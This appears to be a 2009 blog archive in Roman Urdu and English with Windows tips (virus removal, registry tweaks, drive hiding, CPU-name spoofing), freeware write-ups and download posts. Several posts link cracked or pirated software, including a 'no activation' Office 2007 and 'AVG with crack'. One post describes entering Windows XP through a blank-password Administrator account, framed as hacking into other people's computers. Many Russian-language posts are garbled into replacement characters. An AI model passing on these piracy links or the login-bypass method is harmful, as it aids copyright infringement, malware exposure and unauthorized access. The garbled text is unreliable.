All in One uR ThinkinGs , , , , , , ,

2009-09-28T04:08:00.000-07:00

USB sy Virus delete with winrar

2009-09-28T03:53:00.001-07:00

Tamam virus delete karoo Without Software (Tip)

Kuch zaroori malomat:

(1) agar app is tip ko use karte rahin ge to app ko koi antivirus ko instal karne ki zarorat nai pare gi
(2) agg kal jitne B virus hain wo pc me USB Flash or Mobile Cards etc. se dakhil hote hain
(3) agar app USB Flash or Mobile Cards ko use karne se pehlay is tip ko use karin ge to ye virus app K pc ma dakhil hi na ho pain ge.

Tips K 7 Step hain

(1) Sub Se Pehle c Drive format karin
(2) Phir window Karin Note: (window Instal karne K bad koi Drive nai open karni)
(3) Phir cd room se Win rar Software Instal karin
(4) phir win rar software ko open karin
(5) win rar software ki address bar me ja K apni tamam drive ko ek ek kar k open karin
(6) open karne se tamam hidden files show ho jain gi ab wo autorun.ini ho ya ravmon.exe ho is se tarha K tamam virus show ho jain ge
(7) virus show hone par app is ko shift + Del K button se delete kar de

App ki asani K liye win rar software k Screen short or link de raha hoon

2009-09-28T03:52:00.000-07:00

Pc Ki Temporary Files Delete Karen Automatically

Salam...

kaise hain sub ? Main Alhamdulillaah Theek Hu, Allah Ap Sub Ko Bhi Theek Rakhe (Aameen)

Aj jo tip apko batane jaa raha hu bohat zabardast hai is se apka pc overloaded nahi hoga or speedy chalta rahe ga, q k jab temporary files automatically delete ho jaya karen gi ap k pc se...
wo kaise ?

wo aise k zara gor se note farma lein..
sub se pehle Run mai "sysedit" type kar k enter press kar dein
kuch windows khul jayen gi system configrations ki
un mai sub se front pe batch file hogi AUTOEXEC.Bat nam ki.. mostly blank he hoti hai
us mai neechay d gai dono lines copy paste kar dein, jis tara d hain isi tara

deltree /y c:\windows\temp

md c:\windows\temp

bus phir close kar dein or save ka pooche to yes kar dein.. ab her dafa jab system apka restart hoga apki temporary files automatically delete ho chuki hongi..
Apna khyal rakhye ga or muje apni duaon mai yaad rakhye ga..

Allah hafiz

2009-09-28T03:50:00.000-07:00

Hide Ur Partition Drive In Any Windows

ASSALAM-O-ALAIKUM

EK AUR NEW TIP KAY SATH HAZIR HON AB MAIN AP KO
PARTITION DRIVE KO HIDE KAREN KAY BARAY MAIN BATAON
TO START KARTEY HAIN

START-->RUN-->REGEDIT

IS PATH KO FOLLOW KAREN

{HEKY_CURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURR ENT
VERSION\POLIES\EXEPLORER}

RIGTH PANE PER EK (DWORD-VALUE) LEN
NAME (NoDrives)
AGAR A:KO HIDE KARANA HAI TO VALUE (1)

A: = 1
B: = 2
C: = 4
D: = 8
E: = 16
F: = 32

AB AP NE JO PARTITION HIDE KARANA HAIN OS KI VALUE DEN
AUR PARTITION KO HIDE KARALEN

AUR AGAR PARTITION KO UNHIDE KARNA HAI TO VALUE 0 KARDEN

AP NEY JO PARTITION HIDE KIYA HOGA WO UNHIDE HO GAYE GA

{ALLAH HAFIZ}

2009-09-28T03:48:00.000-07:00

Delete Viruses (kisi b software k begair)

Asslamu A'laikum

aj jo tip share karne jaa raha hu ye tip mere boht kaam i
socha ap sub se b share kar du..

waise mera irada tha k ye thread urdu mai post karu.. i know k moderators naraz honge lekin.. ek to der ho jaye gi share karne mai 2nd mere exams start hone wale hain so time nahi hai or na he milay ga ab 2 months...
koi bhai isko urdu mai kar de to acha rahe ga, beshak ye mere wali delete ho jaye...

aksar hamare pc mai autorun.inf wala virus or kuch exe files k sath viruses aa jate hain
hum boht koshish karte hain lekin delete nahi hote, ho b jayen to phir aa jate hain
hum koi software jaise k winrar wagera use karte hain lekin ho sakta hai software wali cd ya usb mai b virus ho..
so in tamam cheezon se bachne k lye apko ye tip azmani hogi

sub se pehle drive C format kar lein, phir jab window ho jaye to My Computer kholen or begair kisi drive khole Folder Option mai jaa k show hidden files ko check kar dein or My Computer close kar dein
ab Ctrl+Alt+Delete press karen
waha pehla tab Applications or doosra Processes ka hoga
Processes pe click kar dein
waha explorer.exe likha hoga, us pe right click kar k End Process kar dein
ab desktop pe sub kuch gaib ho jaye ga
Ab Applications wale tab be click karen, wahan neechay New Task pe click karen or Browse pe click kar dein
phir ek window khulay gi waha se apni sari drives kholen or hidden files show hui hongi autorun.inf or doosri *.exe hidden files
inko select kar k Shift+Delete press kar k delete kar dein
ab us window ko close kar dein or jaha pe ap ne browse kia tha waha "explorer.exe" likh k ok press kar dein
lein g viurs khatam ho gya

2009-09-28T03:46:00.001-07:00

Apna Pc pentium 9 banaein!!!!

salam
kaise hain sub ?
Allah theek rakhe hum sub ko

Ap apne pc ko jitna marzi upgrade kar sakte hain wo kaise ?
ye true nahi lekin funny to hai na
aam aadmi ko iska pata nahi chale ga, balke mere jaise ko b na pata chalta agar pata na ho, wo kaise ?
wo aise, see below

start pe click kar k run mai jayen waha regedit type karen or enter press kar den
phir matluba destination tak is tara jayen
HKEY_LOCAL_MACHINE - HARDWARE - DESCRIPTION - SYSTEM - CentralProcessor - and type this ProcessorNameString
apka computer aa gaya ap jo marzi change kar lein
have a fun...
check karne k lye My Computer pe right click karen or dekhen apna pc
waise figure mai mera pc b dekhen

lekin ab agar koi aisa kare hamare sath to hum kaise check karen ge ?
jitna marzi koi aise change kare

ap ne start phir run pe jaa k "dxdiag" likh k enter press karna hai
ap k pc ki true figer ap k samne aa jaye gi.. jo k change nahi ho sakti..

Allah hafiz

Attached Images

2009-09-28T03:25:00.000-07:00

Agar Hidden Files Show Na Hon To Yahan Ayen...

Asslamu A'laikum

kaise hain sub ?
Allah hum sub ka bhala kare

ap k lye choti c tip le k aya hu, somtimes aisa hota hai k hum ne kuch files hidden ki hoti hain lekin phir jab Folder Options mai jaa k show hidden files ko check karte hain to wo phir b show nahi hoti or automatically Do Not show hidden files check ho jati hai, or hamari files show nahi hoti
us k lye koi antivirus nahi bus regedit mai jana hai or matlooba destination pe pohnch jana hai

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

SHOWALL pe single click kar k right side pe dekhen "CheckedValue" likha hoga, usay dekhen k wo DWORD value hai ?
balke ap usko delete he kar dein
phir phir right click karen or new mai "DWORD value" pe click kar dein
or name mai "CheckedValue" likh dein, uski value 1 rakhni hai(hexadecimal)
bus phir regedit close kar dein or Folder Option mai show hidden files ko check karen ge to apki hidden files show ho jayen gi...

Note: it is personally checked

2009-09-26T07:42:00.001-07:00

HJSPLIT

HJSplit is a popular set of freeware file-splitting programs created by Freebyte.com in collaboration with various programmers. HJSplit supports many platforms (Windows XP, Vista, NT, 2000, 3.x, 95/98/ME, DOS, Amiga, Java, etc.). All versions are compatible with each other and allow you to exchange files between these different platforms. E.g. a file split on the Amiga can be joined on Windows 2000 and vice versa.

Now what's the use of a program like HJSplit? Think of a file of 20 Mb, and try to send this to a friend. Using email this does not succeed, it is simply too large, and how to put it onto a floppy? HJSplit will enable you to split the large file into smaller chunks, which can be much more easily sent and stored.

What about a backup of very large Gigabyte sized files? HJSplit (Windows and Java version) also can handle these! E.g. HJSplit allows you to split a 10 Gb file into 640 Mb parts, which can then be stored onto CD-Rom's by your CD-writer software.

Of course HJSplit can join these split parts back together again, so that the original file is restored. Alternatively, you can use HJJoin for this, which is a tiny and specialized program for joining files.

HJSplit is very reliable, simple, small and easy to use. It does not need any installation or complicated DLLs, it just consists of one '.exe' file.
http://multisoftware-worldwide.blogspot.com
This means
that you can also run it directly from a floppy or CD-Rom.

DOWNLOAD LINK:-
http://rapidshare.com/files/282531673/hjsplit.zip

2009-09-26T07:41:00.001-07:00

PC Tools AntiVirus ver. 6.1.0.25 Free Rus

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :
�� / Download

2009-09-26T07:40:00.000-07:00

Win7Codecs 1.3.3 Final

Win7codecs - �� , �� . �� . �� , �� .

�� : Windows� 7
��: ��

�� / Size: 19.48 Mb

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :

2009-09-26T07:39:00.002-07:00

Nitro.PDF.Professional.6.0.1.8

Nitro PDF Professional - �� PDF. �� PDF, �� , �� PDF �� .

�� , �� Microsoft Word, Excel � PowerPoint. �� (40 �� 128 ��). �� Adobe Acrobat � �� -�� PDF. �� , � �� , ��, �� . �� , �� javascript, �� , �� .

��:
- �� PDF-�� 300 ��
- �� PDF-��
- �� PDF-��
- �� PDF-��
- �� PDF �� Microsoft Word, Excel � PowerPoint, � ��
- �� "��" PDF-�� , ��, ��-�� Microsoft Office
- ��
- �� PDF �� Microsoft Word, WordPerfect, OpenOffice � ��
- �� PDF-��
- ��
- �� , �� , ��, �� .�.
- �� - ��, ��, �� , ��, ��, ��
- �� - ��, ��, �� .�.
- �� PDF-�� - ��, ��, ��, ��, ��
- �� , ��
- �� -��
- ��-�� , ��
- ��, �� PDF-��
- �� , �� -��
- �� , � �� , ��
- �� , � �� "��"
- �� , �� , ��, ��, ��, ��
- ��
- ��
- ��
- ��
- ��
- �� , � �� Microsoft Office 2007
- � �� ...

��/��: Windows 2000/XP/Vista
�� : 2009
�� : ��
��: � ��!

�� / Size: 24 Mb

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :
�� / Download

2009-09-26T07:39:00.001-07:00

WinTuning 7 v1.01 Rus

�� WinTuning 7 �� , �� Windows 7. WinTuning 7 �� , �� , �� . �� Windows 7.

�� , WinTuning 7 �� . � �� , �� , �� .

�� WinTuning 7?
+ ��, �� , �� .�. - �� Windows 7. �� ! �� .
+ �� .
+ �� Windows 7. �� , �� , �� , �� .
+ �� -�� . �� , �� Windows 7 �� .
+ �� . ��

16/09/09 �� WinTuning 7 �� 1.01.
- �� WinTuning 7 Clients Control Center (WT7 3C). WT7 3C - �� , �� -�� , �� . �� WT7 3C, �� "�� WinTuning 7 (WT7 3C)" �� .

OC: Windows 7
��: ��

�� / Size: 13.22 Mb

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :
�� / Download

2009-09-26T07:36:00.000-07:00

Office 2007 Enterprise

Office 2007 Enterprise BLUE

Includes

* Mcft Office Access 2007
* Mcft Office Excel 2007
* Mcft Office Groove 2007
* Mcft Office InfoPath 2007
* Mcft Office OneNote 2007
* Mcft Office Outlook 2007
* Mcft Office PowerPoint 2007
* Mcft Office Publisher 2007
* Mcft Office Word 2007

This is the copy from the original disk, which is (as said before) only accessible to technicians of Mcft. This version of Mcft Office 2007 will never appear for sale, since this is the only version where there is no need for a serial. This version also doesn't need an activation. The installer is very simple, undetailed and handy.
http://multisoftware-worldwide.blogspot.com
The interface of application is completely changed, it is modernized and practically reminds in no way to the previous versions.In a few minutes the software will be installed on your computer, without any questions or other things that slow down the installation.

Install Notes:

1. Burn / Mount iso
2. Run / Autorun setup.exe
3. Wait for it to auto install office without you having to hit next or anything
4. Hit finish
5. Enjoy a fully activated copy of office with no messy keys / cracks!

http://rapidshare.com/files/113609945/OFF07.iso.001
http://rapidshare.com/files/113609947/OFF07.iso.002
http://rapidshare.com/files/113609953/OFF07.iso.003
http://rapidshare.com/files/113609974/OFF07.iso.004
http://rapidshare.com/files/113609949/OFF07.iso.005
http://rapidshare.com/files/113609956/OFF07.iso.006
http://rapidshare.com/files/113609972/OFF07.iso.007
http://rapidshare.com/files/113609970/OFF07.iso.008
http://rapidshare.com/files/113609560/OFF07.iso.009

USE HJSPLIT for joining all the parts
Get HJSPLIT, Winrar 3.70, Daemon Tool(Image Mounting Ware) here.
http://w18.easy-share.com/1702330690.html

2009-09-26T04:32:00.000-07:00

Rocket Torrents Pro 5.3 Pro 2009 Rus

Rocket Torrents Pro ��c� ��o� ��o� ��a��, ��p�� e� �� c�� c��e �� 12 �� X mp3-��, ��p��, ��o�, ��, �p��e��, �� .�. � �.�. Rocket Torrents Pro - �� p��o�e��e, �� �� e�� .
�� Rocket Torrents Pro:
� �� MP3 � �� .
� �� .
� �� .
� �� 10 �� .
� �� .
� �� .
� �� : �� , �� .
� �� , �� .
� �� iPod-��, MP3 � CD ��.
��: 2009
�� : Windows all
�� : �� ( �� )
��: ��
��: 6.52 mb

Letitbit: ��
Depositfiles: ��
Rapidshare: ��

2009-09-26T04:30:00.001-07:00

Videos Daylight 3.3

Videos Daylight - �� . �� , ��, ��, �� .�. Videos Daylight �� 7 �� "��". �� . Videos Daylight �� , �� .

�� : 2009
�� : Windows 2000/XP/Vista
�� : ��
��: ��

�� / Size: 12.06 MB

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :
�� / Download

2009-09-26T04:28:00.000-07:00

Exotic Aquarium 3D Screensaver

�� .
�� , �� . Exotic Aquarium 3D Screensaver �� .

��:
�� 3D ��
��
��
��
��
��

�� : ��
��: Windows All
��: � ��!

�� / Size: 15.59 Mb

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :
�� / Download

2009-09-26T04:27:00.000-07:00

Xilisoft DVD Ripper Ultimate 5.0.51.0910 Portable

�� DVD �� . �� . �� , �� , �� Dolby Surround, �� . �� , �� . Xilisoft DVD Ripper �� .

��:
- �� DVD � DivX, AVI, MPEG, WMV, RM, MOV, XviD, MP4, 3GP, 3G2, ASF � ��
- �� DVD � MP3, WAV, WMA, AAC, AC3, M4A, MP2, OGG � ��
- ��
- ��
- ��
- ��
� �� ...

��.��: Xilisoft
��|�� : �� (Portable)
�� : english
��/��: Windows 2000/2003/XP and Windows Vista

�� / Size: 33.07 Mb

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :
�� / Download

2009-09-26T04:26:00.002-07:00

SeaMonkey 2.0 Beta 2

�� . � �� : ��-��, �� , ��-�� IRC-�� HTML-��. �� (��), �� . �� , �� , �� .
http://multisoftware-worldwide.blogspot.com
�� , �� , �� Cookie. �� . HTML-�� -�� .

�� : Windows 2000/XP/Vista/Server 2003
�� : ��
�� : FreeWare

�� / Size: 10.31 Mb

Sms4file.com :
�� / Download
Vip-file.com :
�� / Download
Letitbit.net :
�� / Download
Turbobit.net :
�� / Download
GetTheBit.com :
�� / Download

2009-09-26T04:26:00.001-07:00

WIIGO (USE CELLPHONE AS WIRELESS WEBCAM)

Click here to download!

2009-09-26T04:25:00.001-07:00

AVG ANTI VIRUS FULL WITH CRACK

DOWNLOAD HERE!
Click Here to start download!

2009-09-26T04:18:00.000-07:00

MOVAVI VIDEO CONVERTER 8(CRACKED)

With this incredible video file converter you can:

* Convert video (including HD!), audio & unprotected DVDs into any formats.
* Rip video and DVDs to watch them on any portable device: iPod, iPhone, PSP, PDA, Zune, Archos, BlackBerry, cell phones, and more.
* Convert video from video-sharing sites.
* Burn video to CD and DVD.
* Tweak your video with unique editing features. Improve video quality with the tools built into the video converter software.
* Specify quality level and fine-tune any output format settings with a single click in the video file converter.
* Save time when you either convert videos or rip video with our ultra high-performance video converting technology.
With this incredible video file converter you can:

* Convert video (including HD!), audio & unprotected DVDs into any formats.
* Rip video and DVDs to watch them on any portable device: iPod, iPhone, PSP, PDA, Zune, Archos, BlackBerry, cell phones, and more.
* Convert video from video-sharing sites.
* Burn video to CD and DVD.
* Tweak your video with unique editing features. Improve video quality with the tools built into the video converter software.
* Specify quality level and fine-tune any output format settings with a single click in the video file converter.
* Save time when you either convert videos or rip video with our ultra high-performance video converting technology.
With this incredible video file converter you can:

* Convert video (including HD!), audio & unprotected DVDs into any formats.
* Rip video and DVDs to watch them on any portable device: iPod, iPhone, PSP, PDA, Zune, Archos, BlackBerry, cell phones, and more.
* Convert video from video-sharing sites.
* Burn video to CD and DVD.
* Tweak your video with unique editing features. Improve video quality with the tools built into the video converter software.
* Specify quality level and fine-tune any output format settings with a single click in the video file converter.
* Save time when you either convert videos or rip video with our ultra high-performance video converting technology.

Use this video converter software to convert video, audio, unprotected DVD to any format
- Movavi Video Converter is a video file converter that supports all the latest media file formats

* NEW! Enhanced conversion algorithm now gives you support for more than 170 video, audio, and image formats. Movavi Video Converter is now truly "one-size-fits-all" audio & video file converter. Video conversions have never been so easy!

* NEW! Save audio files to the popular formats supported in this version of our audio and video format converter.

* Convert video to and from HD formats with this handy HD video format converter. Use ready-made presets for all popular HD video formats or fine-tune HD video quality settings manually. Our video format converter offers plenty of choice!

* Save your unencrypted DVDs to any video format - and preserve the multichannel audio. NEW! Movavi Video Converter supports multi-core processors so you can convert DVDs faster than ever. Convert files from DVD to iPod at 3x the speed!

Convert video for mobile devices
- Use the ready-made presets - all built into our video converter - for all the popular media players

With Movavi Video Converter, you can rip video into the format supported by your mobile device. Just choose the right preset from a wide variety offered by this video converter software:

* Apple iPod, iPhone, Apple TV (MP4)
* Sony PSP (MP4)
* Zune from Microsoft (WMV, MP4)
* Epson portable media players (MP4)
* Creative Zen portable media players (WMV)
* Archos portable media players (WMV)
* BlackBerry (MP4)
* Other PDAs/Pocket PCs (WMV, MP4)
* Cell phones (3GP, 3GP2, MP4)

Convert online video and go portable with Movavi Video Converter
- Use Movavi Video Converter to download and convert online video

* Convert video – including HD format – from a whole range of popular video-sharing websites right inside our handy video format converter.

* NEW! Unlike ordinary video format converters, Movavi Video Converter supports H.264 codec, a format used by more & more online video sharing sites. Just hit the "+URL" button to set the conversion going - with Movavi Video Converter, there's no limitation to online video conversions!

Specify quality level and other output settings as you convert video
- Get the exact results you want when you convert videos using this video converter software - without any special knowledge!

* With Movavi Video Converter's 'Target Quality' option, you can specify the quality and size of the output file in one click: just choose the output format you need, move the slider, and our video file converter will calculate the output file size for the chosen quality level.

* NEW! Now you can convert videos to different formats at once. To define a format or special format settings for multiple copies of one video file use new 'Duplicate' button.

* While beginners wanting to convert video will love all the video converter's ready-made presets - for all popular formats - advanced users will appreciate greater control over their video converting,
http://multisoftware-worldwide.blogspot.com
with the ability to manually select all the parameters of the output video. So whether you're experienced or just starting out our video file converter puts the power in your hands.

Save videos to CDs and DVDs in the burning mode of the video converter
- Movavi Video Converter gives you full control over the burning process

* Burn video to CD and DVD right inside this video file converter using the embedded burner.

* Choose from more than a dozen static and animated DVD themes to create a professional-looking menu that grabs your viewers' attention!

* Customize your DVD menu: add your own .mp3 background audio and loop video inside a theme.

Improve video quality, tweak your video with the video converter's editing tools
- Our video file converter allows you not only to rip video, but also to cut, merge, crop, rotate, adjust and add watermarks

Movavi Video Converter is the only video converter software to include these editing tools. Now you can not only rip video with this amazing video format converter, but also perform basic editing and adjust video quality. Now that's what you call a powerful video format converter!

* Crop video quickly and easily to create a specific rectangular area within the video. Ideal if you need to convert video to a different screen size.

* Rotate video by 90, 180, or 270 degrees - useful if you need to convert video from a device that rotates captured video.

* Improve video quality with professional filters to solve the most common problems as you convert video files.

* Add Watermark - overlay text or a graphic logo. A must-have feature for advanced video converter software users!

Save time with efficient video converting technology of this video file converter
- Movavi Video Converter speeds up video converting by helping you get the most out of your hardware

* Support for multi-core processors means video converting is faster than ever!

* Batch conversion saves time by letting you convert video files and DVDs in batches. That means you can use the video file converer to convert video files in groups, i.e. multiple videos at once.

* Convert video while you sleep. Need to do a lot of video converting e.g. a whole library of high quality video files? Just let Movavi Video Converter do it for you while you sleep. When it's done, the video format converter will close itself and power down your computer safely.

2009-09-25T12:57:00.002-07:00

Download DeskTube Desktop Application To Watch YouTube Video Clips Without Browser

If logging to YouTube video sharing site via your Internet Exploer, Safari or Firefox browser is still considered tedious and sluggish, DeskTube, the so called YouTube desktop application perhaps has the answer for you. DeskTube, like its name suggests, is a free desktop application which combines Desktop and YouTube functions to give YouTube enthusiasts instant access to the video site just by double clicking the application on the desktop.

DeskTube allows users to access all the YouTube functions via its simple and cleaner interface. Users can search video, copy video url, copy embed code, add comments, view video information and check related videos via the application.

http://multisoftware-worldwide.blogspot.com
YouTube users can log in to their accounts to upload videos, post comments, and check out personal playlists and subscriptions. Furthermore, DeskTube has also collaborated with a few social networking sites such as Facebook, Twitter and MySpace to allow users to interact and communicate with their friends via its video chat feature and quick access to these sites.

DeskTube offers users a quick and straightforward video browsing experience to enjoy YouTube video clips and communicate with friends in a unique way without opening a browser. Users can enjoy chatting and sharing interesting video clips with friends simultaneously. The overall performance of this application is quite stable and satisfactory. Users need to preinstall Adobe AIR app prior to installing it.

Download DeskTube via the link here.

2009-09-25T12:57:00.001-07:00

View The Deleted Video Clips from YouTube

Sometimes due to violation of YouTube terms or copyright infringement, some video clips from YouTube will have been removed. YouTube will prompt you with some irritating messages such as: “This video is no longer available due to a copyright claimed by ABC Company”. What can you do when you see this annoying message?

http://multisoftware-worldwide.blogspot.com
The video clips that you intend to view might contain something interesting but impropriate, e.g. sex, porno, political scandals, etc. What can you do to view the deleted, erased, private or flagged video clips anyway?

In our previous post, we have highlighted the possibility of using Delutube to watch the deleted, private or flagged YouTube. Technically if a controversial video was officially removed or deleted from YouTube, the clip might still be kept on one of YouTube’s or Google’s servers for a short period of time. You can view the deleted or inaccessible video clips by entering the Youtube Video ID. Read Watch Deleted, Private or Flagged YouTube Video Clips with Delutube.

Besides Delutube, there are a few other deleted YouTube viewers you can perhaps try: -

FtvTeen.com

You can find some deleted or removed video clips from these websites. You can search for the deleted clips by name or by ID. However, these websites may contain adult content that is illegal for below age viewers.

TubeMall UndeleTube

UndeleTube is another service provided to view the removed video clips from YouTube. It works pretty well.

2009-09-25T12:53:00.000-07:00

Auto Login to Windows Without Entering Password

When you access to your Windows, either Windows Vista or Windows XP, you will be greeted by a welcome page. You need to enter your users or admin password to go in to the Windows. This process is mainly designed for security purposes.

http://multisoftware-worldwide.blogspot.com
However, if you feel that going through this process is a bit irritated and annoyed, you can actually personalized your PC by allowing you to login automatic to your Windows without entering the password.

Log in page

You can auto login to your Windows via the following steps: -

For Windows XP
1. Go to start > RUN
2 Type control userpasswords2 in the run box prompted out

3. Select the user from which you want to login automatically and uncheck the box “Users must enter a username and password to use this computer”.

4. Enter the password of the account in the box

5. Click ok

For Window Vista:
1. Go to start
2. Type netplwiz in the search box
3. Select the user from which you want to login automatically and uncheck the box “Users must enter a username and password to use this computer”.
4. Enter the password of the account in the box.
5. Click ok

Once you have done it, you will login automatically whenever you access your computer.

2009-09-25T12:52:00.000-07:00

Easily Login to Windows XP with No Password Administrator Account Backdoor Trick

In password-protected Windows XP Home or Professional edition system, each user logs on to his or her own user name and password to have full access to the Windows computer. However, Windows user or administrator can still log in to the Windows XP machine without knowing the original password, if they have lost or forgotten the user ID or password, by using various bypass or crack method such as using DreamPackPL to bypass the need to logon using valid account or password, crack or brute force retrieve the Windows passwords for various user or administrator account with Ophcrack2, and using third party services such as Login Recovery to retrieval and recovery of Windows user name and passwords. However, there is one simpler method to hack into a Windows XP system, if the computer owner installed Windows XP, and forgot or not set the Administrator account password.

By default installation, Windows XP has a built-in Administrator account which equivalent to root or superuser privilege account in Linux or Unix that contains no password. In other word, hacker or any people can simply key in Administrator as user name at the Windows Logon Welcome Screen prompt with blank password (no password) and get full administrative access as superuser to the Windows PC. Worse, most computer owners don’t even know such an Administrator account is actually existed, don’t even mentioned they will create or set a password for Administrator user account.

So this security vulnerability flaw provides an easy way to hack into any Windows XP computer that the user forgets or simply does not set a password for the Administrator user ID.

http://multisoftware-worldwide.blogspot.com
The problem is that in normal Windows XP Welcome Screen where you choose which user name you want to log onto, the Administrator user name is not displayed and is not shown. If you can’t choose or select the Administrator from the login screen, then how are you going to log-in with the Administrator account? The following video clip provides a simple hack and trick.

Basically, at Windows XP Welcom Screen, simply press Ctrl-Alt-Del keys sequence together twice, and you will be shown a Log On to Windows menu which you can specify User Name and Password. In the User Name text box, key in “Administrator” (without quote) and leave the Password field blank. Then press Enter or click on OK. If there is not password protects the Administrator account, or blank password is set, then you will be able to access the Windows with full administrative privileges as Administrator.

2009-09-25T12:50:00.000-07:00

Link Up Facebook With Google, Yahoo or MySpace Account For Auto-Login

Having many login IDs and passwords is encouraged in terms of security but it might not be a good approach for absent minded people. Nowadays, users have accounts in Youtube, Facebook, Yahoo, Google, etc. and this can translate into a huge hassle if users were to check each account every day. Having to log in to the account with the right user name, and remembering the corresponding password can lead to mishaps especially if users are not using their own laptops or desktops with pre-saved names and passwords. For easy and quick login, the social networking website, Facebook, now allows users to link their account with Google, Yahoo or MySpace. In other words, when users sign in to their Google account, e.g Gmail, they will be able to automatically login to their Facebook account without having to type in their login ID and password again.

To link up the Facebook account with their Google, Yahoo or MySpace account, users need to login to Facebook and go to Settings -> Account Settings.
http://multisoftware-worldwide.blogspot.com
In the Account Settings page, click on to the “Linked Account” item. Users are given a choice of linking their Facebook to Google, Yahoo, MySpace or other open IDs.

To add link to their Google account, for instance, users just need to select Google in the scroll down list. Users will thence be prompted a new window which seeks users’ permission whether to allow or disallow the linking. Clicking on the “Allow” button will thence allow the social networking site to link to users’ Google account.

2009-09-25T12:49:00.002-07:00

RapidShare Link Checker

RapidShare.com Link Checker is a tool to check and verify the validity, availability and existence of files hosted and shared on RapidShare.com 1-click web hosting service. The utility is useful when you have a list of RapidShare-URLs or download links, where all files must still available for download to be useful.

http://multisoftware-worldwide.blogspot.com
Using RapidShare.com Link Checker, all download links will be checked to see if the link still working and all files exist on RapidShare servers.

If the file does not exist, the link will be shown in red. If the file exists but the server is down, the file will be shown in yellow. If the file is available for download, the link will be shown in green.

Enter one full RapidShare sharing URL per line in the box below, e.g http://rapidshare.com/files/88888888/file.zip, and then press “Check URLs” button.

2009-09-25T12:49:00.001-07:00

Malicious Software Removal Tools by Microsoft

Microsoft released its Windows Malicious Software Removal Tools lately. This removal tool can check whether computers running under Windows Vista, Windows XP, Windows 2000 and Windows Server 2003 are infected by any specific or prevalent malicious software or Malware which can damage your computer such as Blaster, Sasser and Mydoom.

http://multisoftware-worldwide.blogspot.com
Once the removal tool has completed the detection and removal process, the tool will report the action outcome whether any Malware has been detected and removed. The tool will thence create a log file named mrt.log in the %WINDIR%\debug folder. The monthly update of this removal tool will soon be available from Microsoft. Users can set the automatic update features to Automatic in order to get the latest update version automatically delivered and installed.

User can review the KB article, KB890830, for the list of malicious software that the current version of the tool is capable of removing as well as usage instructions. Also, please be aware that this tool reports anonymous information back to Microsoft in the event that an infection is found or an error is encountered. The above KB article contains information on how to disable this functionality and what specific information is sent to Microsoft. Users are also advised to review KB article, KB891716, before deploying this tool in an enterprise environment.

Download the x64 version of Malicious Software Removal Tool via the link here.

2009-09-25T12:46:00.000-07:00

Activate and Enable iPhone as Internet Tethering Wireless Modem Without Hack or Jailbreak

Apple has built Internet tethering capability to iPhone, iPhone 3G and iPhone 3G S in its newest iPhone OS software 3.0. Internet tethering allows iPhone owners to use iPhone as wireless modem or dongle device to connect the PC or notebook computer to Internet for surfing and browsing. However, for commercial purpose, Internet tethering is disabled or blocked by default, as most mobile network carriers or operators want to charge extra fee for Internet tethering privilege, although existing service plans already allow certain limited bandwidth or even unlimited amount of data downloads.

Instead of paying excessive amount of money (most in the high 10s) in addition to the already-overpriced iPhone plan price, there was a fews hacks to enable Internet tethering on jailbroken iPhone previously. With built-in support for Internet gateway tethering in iPhone with the release of iPhone OS software 3.0, there is a very simple hack for iPhone OS 3.0 upgrader to enable Internet tethering, without paying anything extra or subscription fee to the mobile operator, and without jailbreak or unlock.

How to Activate and Enable Free Internet Tethering on iPhone 3.0

Run Safari mobile web browser on the iPhone.
Optional: If you want to generate your own mobileconfig with custom APN, username and password with Mobileconfig Generator, visit http://help.benm.at/help.php.

In most case, just visit the next link directly, as the configuration files for most mobile carriers around the world have been prepared. If you’re following this link, click on Mobileconfigs.
Visit the following Mobileconfigs website:
http://help.benm.at/tethering.php

Alternative: http://www.iphone-notes.de/mobileconfig/
Select your country.
Select your mobile service provider.
Tap Install to install new profile.
Select Install Now to download and install new profile.
On iPhone interface, go to Settings -> General -> Network -> Internet Tethering.
Set Internet Tethering to On.
If prompted that Bluetooth is off, select Turn on Bluetooth or USB Only according to your preference.
Internet tethering is enabled, connect iPhone to PC computer via USB or Bluetooth to start connecting to Internet though iPhone as tethered Internet gateway modem, with typical mobile broadband connection speed, normally up to around 1.4 Mbps. Meanwhile, iPhone will glow blue too.

Note: Tethering computer through USB to iPhone to access Internet is much easier. Normally, Windows or Mac system will automatically recognize the tethered iPhone, and create require network connection to take advantage of the shared Internet access via iPhone. For Bluetooth connection, other than usual pairing, user also has to select “Connect to Network” from the Bluetooth device option in order to access the Internet from desktop or notebook/laptop computer via tethered iPhone.

Actually, the hack can be performed manually by iPhone owner himself or herself. The profile download link above provides easiest and most convenient way to activate and enable Internet Tethering without hassle though. BenM.at is gathering all these publicly available information such as APN (access point name) and password for the iPhone for many network across the world, and create a XML based profile by using Apple’s iPhone Configuration Utility.

http://multisoftware-worldwide.blogspot.com
The hosted iPhone tethering configuration profiles is pushed to the handsets of iPhone users who download the profile, and instant activates the tethering system free of charge.

After downloading and installing the new Internet tethering enabled profile, some users may report MMS and/or VVM (Visual Voicemail) problem, where MMS or Visual Voicemail stops working. To fix the MMS and VVM not working after enabling Internet tethering error, go to Settings -> General -> Reset -> Reset Network Settings. After the short reset, iPhone should be able to be used for MMS, Voicemail and Internet tethering.

2009-09-25T10:38:00.000-07:00

Invisible Secrets 4.6

Click this bar to view the full image.

Quote:
nvisible Secrets 4.6

Invisible Secrets not only encrypts your data and files for safe keeping or for secure transfer across the net, it also hides them in places that on the surface appear totally innocent, such as picture or sound files, or web pages.
http://multisoftware-worldwide.blogspot.com

3.8 MB
Download:
Code:

Code:

